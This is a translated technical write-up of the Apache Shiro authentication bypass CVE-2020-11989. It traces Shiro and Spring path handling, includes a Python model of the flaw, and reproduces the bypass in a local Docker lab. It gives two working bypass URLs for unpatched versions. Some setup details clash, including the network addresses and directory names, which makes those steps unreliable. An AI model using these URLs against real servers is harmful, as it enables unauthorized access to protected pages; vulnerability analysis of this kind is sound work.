
Apache Shiro permission bypass vulnerability CVE-2020-11989: mining, analysis and reproduction

2025-10-26 Update. From: SLTechnology News&Howtos (shulou), Network Security


Shulou(Shulou.com)05/31 Report--

This article describes the mining, analysis and reproduction of the Apache Shiro permission bypass vulnerability CVE-2020-11989. The content is fairly detailed; interested readers can refer to it, and I hope it is helpful.

1.1 Status

Vulnerability mining condition analysis and vulnerability reproduction are complete.

1.2 Introduction

As a Java framework, Apache Shiro can be used for authentication, authorization and other tasks.

When Apache Shiro is integrated into Spring Boot, crafted requests can bypass authentication (an unauthorized-access, or ultra vires, condition). There are two practical exploitation variants, referred to below as utilization method 1 and utilization method 2.

Versions with the security flaw: Apache Shiro versions prior to 1.5.3. JDK: 1.8.0_181.

1.3 Vulnerability mining prerequisites

Be familiar with the logic of the Spring Boot and Apache Shiro framework source code.

Know the common characteristics of filter bypasses and of unusual (non-conventional) characters.

1.4 Utilization method 1

1.4.1 Environment

Set the Tomcat root directory (context path) to "/test/" [only Apache Shiro 1.5.2 has this strict restriction] and the port to 8088; configure the "/admin/*" path to require authentication, displaying "hello, admin page" on success. For details, see the source code (https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code/tree/main/springboot-shiro-master0).

1.4.2 Goal

Bypass authentication and access the "/admin/*" path.

1.4.3 Analysis

For the malicious URL "http://localhost:8088/;/test/admin/page", Shiro performs the permission check first. Shiro's decodeAndCleanUriString method truncates the URI "/;/test//admin/page" at the first ";", keeping only the part before it, so the request passes the permission check. The important classes and methods traversed, in order, are as follows:

Class + method: org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getChain
Key content: -

Class + method: org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getPathWithinApplication
Key content:
    String contextPath = getContextPath(request);   // = "/;/test"
    String requestUri = getRequestUri(request);     // the output is the input value for Shiro's permission check
    if (StringUtils.startsWithIgnoreCase(requestUri, contextPath)) {
        // Normal case: URI contains context path.
        String path = requestUri.substring(contextPath.length());
        return (StringUtils.hasText(path) ? path : "/");
    } else {
        // Special case: rather unusual.
        return requestUri;
    }

Class + method: org.apache.shiro.web.util.WebUtils#getRequestUri
Key content:
    String uri = valueOrEmpty(request.getContextPath()) + "/" + valueOrEmpty(request.getServletPath()) + valueOrEmpty(request.getPathInfo());   // = "/;/test//admin/page"
    return normalize(decodeAndCleanUriString(request, uri));

Class + method: org.apache.shiro.web.util.WebUtils#decodeAndCleanUriString
Key content:
    int semicolonIndex = uri.indexOf(';');

The URL is then parsed by the Spring framework. The key point is that during Spring's decoding only the ";" content is removed from the URI and everything else is preserved, so Spring resolves the target path "/admin/page". The important classes and methods traversed, in order, are as follows:

Class + method: org.springframework.web.util.UrlPathHelper#getPathWithinServletMapping
Key content:
    String pathWithinApp = getPathWithinApplication(request);
    String servletPath = getServletPath(request);
    return servletPath;

Class + method: org.springframework.web.util.UrlPathHelper#getPathWithinApplication
Key content:
    String contextPath = getContextPath(request);   // = "/;/test"
    String requestUri = getRequestUri(request);
    return requestUri;

Class + method: org.springframework.web.util.UrlPathHelper#getRequestUri
Key content:
    String uri = (String) request.getAttribute(WebUtils.INCLUDE_REQUEST_URI_ATTRIBUTE);   // = "/;/test/admin/page"
    return decodeAndCleanUriString(request, uri);

Class + method: org.springframework.web.util.UrlPathHelper#decodeAndCleanUriString
Key content:
    uri = removeSemicolonContent(uri);        // = "//test/admin/page"
    uri = decodeRequestString(request, uri);  // = "//test/admin/page"
    uri = getSanitizedPath(uri);              // = "//test/admin/page"
    return uri;

Class + method: org.springframework.web.util.UrlPathHelper#getServletPath
Key content:
    String servletPath = (String) request.getAttribute(WebUtils.INCLUDE_SERVLET_PATH_ATTRIBUTE);   // = "/admin/page"
    return servletPath;   // = "/admin/page"

1.5 Utilization method 2

1.5.1 Environment

Set the Tomcat root directory (context path) to "/test/" [only Apache Shiro 1.5.2 has this strict restriction] and the port to 8081; configure the "/admin/*" path to require authentication, displaying "hello,admin" on success. For the specific configuration, see the source code (https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code/tree/main/springboot-shiro-master).

1.5.2 Target

Bypass authentication and access the "/admin/{name}" path.

1.5.3 Analysis

For the malicious URL "http://localhost:8081/test/admin/a%25%32%66a", Shiro performs the permission check first. Shiro's decodeRequestString method decodes the path a second time, yielding the URI "/admin/a/a"; the request passes the permission check because the path, split into segments, is longer than the template "/admin/*" allows. The important classes and methods traversed, in order, are as follows:

Class + method: org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getChain
Key content:
    String requestURI = getPathWithinApplication(request);
    if (pathMatches(pathPattern, requestURI)) { ... }
    return null;

Class + method: org.apache.shiro.web.util.WebUtils#getPathWithinApplication
Key content:
    String contextPath = getContextPath(request);   // = "/test"
    String requestUri = getRequestUri(request);

Class + method: org.apache.shiro.web.util.WebUtils#getRequestUri
Key content:
    String uri = valueOrEmpty(request.getContextPath()) + "/" + valueOrEmpty(request.getServletPath()) + valueOrEmpty(request.getPathInfo());   // = "/test//admin/a%2fa"
    return normalize(decodeAndCleanUriString(request, uri));

Class + method: org.apache.shiro.web.util.WebUtils#decodeAndCleanUriString
Key content:
    uri = decodeRequestString(request, uri);
    return (semicolonIndex != -1 ? uri.substring(0, semicolonIndex) : uri);

Class + method: org.apache.shiro.web.util.WebUtils#decodeRequestString
Key content:
    return URLDecoder.decode(source, enc);

Class + method: java.net.URLDecoder#decode(java.lang.String, java.lang.String)
Key content:
    // decodes "%2f" to "/"
    while (i < numChars) {
        c = s.charAt(i);
        switch (c) {
            case '+':
                sb.append(' ');
                i++;
                needToChange = true;
                break;
            case '%':
                ......
        }
    }
    return (needToChange ? sb.toString() : s);   // = "/test//admin/a/a"

Class + method: org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#pathMatches
Key content:
    return pathMatcher.matches(pattern, path);   // pattern: "/admin/*", source: "/admin/a/a"

Class + method: org.apache.shiro.util.PatternMatcher#matches
Key content:
    return match(pattern, source);

Class + method: org.apache.shiro.util.AntPathMatcher#doMatch
Key content:
    // If the template is shorter than the URI, the URI and the current template do not belong to the same class.
    if (pathIdxStart > pathIdxEnd) {
        // Path is exhausted, only match if rest of pattern is * or **
        ......
    } else if (pattIdxStart > pattIdxEnd) {
        // String not exhausted, but pattern is. Failure.
        return false;
    }

The URL is then parsed by the Spring framework. The key point is that Spring decodes the path only once, giving "/test/admin/a%252f", so the request is served normally under the "/admin/{name}" mapping. The important classes and methods traversed, in order, are as follows:

Class + method: javax.servlet.Servlet#service
Key content: -

Class + method: javax.servlet.http.HttpServlet#doGet
Key content: -
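As an added illustration (not code from this page, nor from Shiro or Spring), the following Python model reproduces the two path views traced in the tables for both utilization methods: Shiro's getPathWithinApplication pipeline (join the parts, URL-decode again, cut at the first ";", collapse slashes, strip the context path) and Spring's servlet-path view, and it flags a request that Spring would route to an /admin handler while Shiro's view never matched the /admin/* chain. It assumes the container has already decoded the servlet path once, replaces Shiro's full normalize with duplicate-slash collapsing only, and uses a minimal Ant matcher in which "*" and "{name}" each match exactly one segment.

```python
import re
from urllib.parse import unquote

SHIRO_AUTHC_PATTERN = "/admin/*"                          # Shiro filter-chain entry from the page
SPRING_HANDLER_PATTERNS = ("/admin/*", "/admin/{name}")   # controller mappings from the page


def ant_match(pattern, path):
    """Minimal Ant-style matcher: '*' and '{name}' match exactly one segment.
    A segment-count mismatch fails, as in AntPathMatcher#doMatch."""
    pat, segs = pattern.strip("/").split("/"), path.strip("/").split("/")
    if len(pat) != len(segs):
        return False
    return all(p == "*" or p.startswith("{") or p == s for p, s in zip(pat, segs))


def shiro_path_within_application(context_path, servlet_path, path_info=""):
    """Model of WebUtils#getRequestUri -> decodeAndCleanUriString -> normalize ->
    getPathWithinApplication, using the values the page traces.
    Assumption: servlet_path is what the container hands over (already decoded once)."""
    uri = context_path + "/" + servlet_path + path_info
    uri = unquote(uri)                     # decodeRequestString: a second decode ("%2f" -> "/")
    semicolon = uri.find(";")
    if semicolon != -1:
        uri = uri[:semicolon]              # everything from the first ';' onward is dropped
    uri = re.sub(r"/+", "/", uri) or "/"   # normalize (only duplicate slashes are modelled)
    if uri.lower().startswith(context_path.lower()):
        rest = uri[len(context_path):]
        return rest if rest else "/"
    return uri                             # "special case": URI no longer contains the context path


def spring_servlet_path(servlet_path):
    """UrlPathHelper#getServletPath simply returns the container's servlet path."""
    return servlet_path


def check_request(context_path, servlet_path, path_info=""):
    """Return (shiro_view, spring_view, bypass). bypass is True when Spring would route
    the request to an /admin handler while Shiro's view never hit the /admin/* chain."""
    shiro_view = shiro_path_within_application(context_path, servlet_path, path_info)
    spring_view = spring_servlet_path(servlet_path)
    guarded = ant_match(SHIRO_AUTHC_PATTERN, shiro_view)
    routed = any(ant_match(p, spring_view) for p in SPRING_HANDLER_PATTERNS)
    return shiro_view, spring_view, routed and not guarded


if __name__ == "__main__":
    # Constructed inputs mirroring the two URLs on the page, plus a benign request
    for ctx, sp in (("/;/test", "/admin/page"), ("/test", "/admin/a%2fa"), ("/test", "/admin/page")):
        print(ctx, sp, "->", check_request(ctx, sp))
```

For the two crafted inputs the Shiro view is "/" and "/admin/a/a" respectively, neither of which matches "/admin/*", while Spring still routes both to the admin handler.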

1.6 Patch Analysis

As shown in the following figure, org.apache.shiro.web.util.WebUtils#getPathWithinApplication is modified: it now obtains the URI through two standard servlet methods, which effectively handles the "/;/..." defect, and it no longer performs any decoding step, which effectively handles the "a%25%32%66a" defect.

1.7 Docker reproduction

Example of loading a container tar as an image:

    cat ./ubuntu-xxx.tar | docker import - ubuntu-new

Examples of setting up a local network and container IP and starting the container:

(1) Create a custom network

    docker network create --subnet=192.168.10.1/24 testnet

(2) Start the docker container

    docker run -p 8088:8088 -p 8081:8081 -it --hostname testt3 --network testnet --ip 10.10.10.100 ubuntuxxx:xxx /bin/bash

The image is named ubuntu_cve-2020-11989:v1, and port mapping for 8088 and 8081 must be enabled.

After entering the container, reproduce utilization method 1: change to the directory /springboot-shiro-master0/target and run the command java -jar srpingboot-shiro-0.0.1-SNAPSHOT.jar. Then open http://localhost:8088/;/test/admin/page in the host browser; successful access shows that the reproduction succeeded, as shown below.

Reproduce utilization method 2: interrupt the current program, change to the directory /springboot-shiro-master1/target and run the command java -jar srpingboot-shiro-0.0.1-SNAPSHOT.jar. Then open http://localhost:8081/test/admin/a%25%32%66a in the host browser; successful access shows that the reproduction succeeded, as shown below.

That concludes the mining, analysis and reproduction of the Apache Shiro permission bypass vulnerability CVE-2020-11989. I hope the above content is helpful and lets you learn something more. If you think the article is good, feel free to share it so more people can see it.
